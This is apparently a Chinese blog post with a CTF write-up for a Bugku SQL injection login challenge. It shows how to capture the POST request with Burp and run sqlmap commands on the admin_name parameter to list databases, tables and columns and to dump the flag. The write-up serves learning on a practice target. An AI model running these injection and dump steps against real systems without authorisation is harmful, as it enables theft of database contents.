您的位置:首页 > 数据库

这是一个神奇的登录框(Bugku-web题 使用sqlmap注入实例)

2018-03-14 19:46 1546 查看
正在学习sqlmap,拿这个题先入门一下。
题目链接:http://120.24.86.145:9001/sql/
先看下源代码:



是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。
首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码)



我保存到了D盘的1.txt里。
然后打开sqlmap,输入指令:sqlmap.py -r "D:\1.txt" -p admin_name --dbs
解释一下 -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了admin_name是注入点) --dbs意思是想获取数据库名字
可以看到sqlmap获得了数据库的名字:



应该是这个bugkul1,再继续爆表,命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -p admin_name --tables
解释:-D是表示选择了后面的这个数据库 --tables是想获取表
可以看到爆出了表:



应该在flag1这个表里,继续爆列名:
命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -p admin_name --columns
解释类似上面 不过加了一个-T 指定表
可以发现爆出了列名:



flag1这个列 最后查字段 命令:sqlmap.py -r "D:\1.txt" -D bugkusql1 -T flag1 -C flag1 -p admin_name --dump
解释:同上面 --dump是获取字段的命令
(在这过程中可能会让你选择Y或者N 我直接回车的)
可以看到爆出了flag:

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  CTF
相关文章推荐